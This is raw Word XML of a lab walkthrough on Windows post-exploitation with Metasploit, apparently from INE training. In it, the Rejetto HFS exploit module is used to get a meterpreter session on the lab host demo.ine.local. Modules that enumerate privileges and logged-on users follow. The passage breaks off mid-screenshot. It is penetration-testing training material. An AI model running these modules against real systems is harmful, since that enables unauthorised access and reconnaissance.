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BC84" w14:textId="14171EF1" w:rsidR="00853ABF" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Post Exploitation Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E284C7" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRDefault="00E52F12"/>
    <w:p w14:paraId="59C8E2D4" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB2BC61" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F19528" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t> Your task is to run various Windows Post Exploitation Metasploit modules against the compromised target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EC6DA" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRDefault="00E52F12"/>
    <w:p w14:paraId="468726F0" w14:textId="52A26808" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0CCC7C" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D838C" w14:textId="001EB41D" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A509E37" wp14:editId="3E5C78DB">
            <wp:extent cx="5943600" cy="3377565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="479768216" name="Picture 2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77565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C44D0" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68A6D1" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4962A" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69919502" w14:textId="4069D05C" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366B3223" wp14:editId="4CB50F1E">
            <wp:extent cx="5848651" cy="2419474"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1332440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40178" name="Picture 1332440178"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5848651" cy="2419474"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="110E6012" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F884D0E" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> Run </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> scan against the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B010CF8" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B5BBC" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15DB2CBE" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">This scan may take </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>upto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> a minute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145028A7" w14:textId="5C21ED0E" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C901299" wp14:editId="7909B339">
            <wp:extent cx="5734345" cy="3606985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3268152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15295" name="Picture 326815295"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734345" cy="3606985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5461A" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12"/>
    <w:p w14:paraId="4632FA07" w14:textId="4603F7DA" w:rsidR="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2148389E" wp14:editId="40B6C42D">
            <wp:extent cx="5874052" cy="1955901"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="955218260" name="Picture 2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8260" name="Picture 25" descr="A computer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74052" cy="1955901"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="623447E9" w14:textId="0B1F2DF6" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">The target system has a vulnerable version of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> HTTP File Server running on port 80 that can be exploited </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> a Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB7AD29" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t> To begin with, we will need to start up the Metasploit Framework Console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>) by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437AA681" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53528DEF" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211BF952" w14:textId="5D8B4D71" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>We can then load the module by running the following command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4426E1CF" wp14:editId="33527C1D">
            <wp:extent cx="3854648" cy="673135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1662387555" name="Picture 26"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87555" name="Picture 26" descr="A black rectangle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54648" cy="673135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49387D0E" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172259C1" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>use exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>rejetto_hfs_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1BDA0886" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>After loading the module, we will need to configure the module options, more specifically the target IP option. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1685B421" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C195A" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4245507C" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>We can now execute the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D8720" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A5CDEA" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D94414" w14:textId="58691753" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B09DB9" wp14:editId="64149D25">
            <wp:extent cx="5689892" cy="4610337"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="49901733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17337" name="Picture 28"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89892" cy="4610337"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E158456" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">As shown in the preceding screenshot, the successful execution of the module will provide us with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82C59C" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>We have now gained access to the Windows system and can begin the process of automating post exploitation with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3E0DF" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t> Automating post-exploitation with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12366D68" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">Given that have obtained a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> session on the target system, we can leverage various post-exploitation modules to automate the enumeration of important information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FF091" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">To begin with, you will need to put your current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> session in the background, this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CD6F2" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711EEDCF" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A960D9E" w14:textId="2700A80A" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F77BD2" wp14:editId="2238BA97">
            <wp:extent cx="5943600" cy="634365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="224594180"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onten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34365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79954421" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>The first module we can explore is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>win_privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t> module, which can be used to automate the enumeration of the current user privileges. We can load the module, configure the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t> option and then run it using the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63AF1B" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141883D" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>win_privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A142F27" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361BE58" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFE65F" w14:textId="0CA94337" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54843C2B" wp14:editId="033C49FD">
            <wp:extent cx="5626389" cy="3848298"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="488560252"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0252" name="Picture 29"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26389" cy="3848298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC5B163" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>As shown in the preceding screenshot, this module will enumerate the privileges of the current user you have access to on the target system and will provide you with useful information like whether the user is admin and whether UAC is enabled or disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04330BDE" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>The next module we can use is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_logged_on_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t> which as the name suggests, enumerates a list of currently and previous logged on users. Run the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B0284" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C44A3" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:lastRenderedPageBreak/>
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>enum_logged_on_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D621461" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B4AE20" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C88AFC8" w14:textId="5C953AA2" w:rsidR="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F74187" wp14:editId="48F585A3">
            <wp:extent cx="5708943" cy="3333921"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
